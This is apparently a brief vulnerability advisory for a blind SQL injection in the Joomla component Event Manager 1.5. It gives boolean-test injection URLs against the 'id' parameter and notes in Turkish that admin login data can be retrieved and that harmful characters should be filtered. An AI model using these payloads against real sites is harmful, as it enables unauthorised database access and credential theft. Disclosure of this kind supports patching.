32 lines
No EOL
970 B
Text
32 lines
No EOL
970 B
Text
<------------------- header data start ------------------- >
|
|
|
|
#####################################################################
|
|
#Joomla Component Event Manager Blind SQL Injection Vulnerability #
|
|
#####################################################################
|
|
|
|
|
|
# author : Fl0riX
|
|
|
|
# Script Name : Joomla Component Event Manager 1.5
|
|
|
|
# Bug Type : Blind SQL Injection
|
|
|
|
# Infection : Admin login bilgileri al�nabilir.
|
|
|
|
# Demo Vuln. :
|
|
(+)
|
|
� http://server/eventmanager/index.php?option=com_content&view=article&id=44 and 1=2
|
|
(+)
|
|
� http://server/eventmanager/index.php?option=com_content&view=article&id=44 and 1=1
|
|
|
|
# Bug Fix Advice : Zararl� karakterler filtrelenmelidir.
|
|
|
|
#############################################################
|
|
|
|
< ------------------- header data end of ------------------- >
|
|
|
|
< -- bug code start -- >
|
|
|
|
path/index.php?option=com_content&view=article&id=[Blind]
|
|
|
|
< -- bug code end of -- > |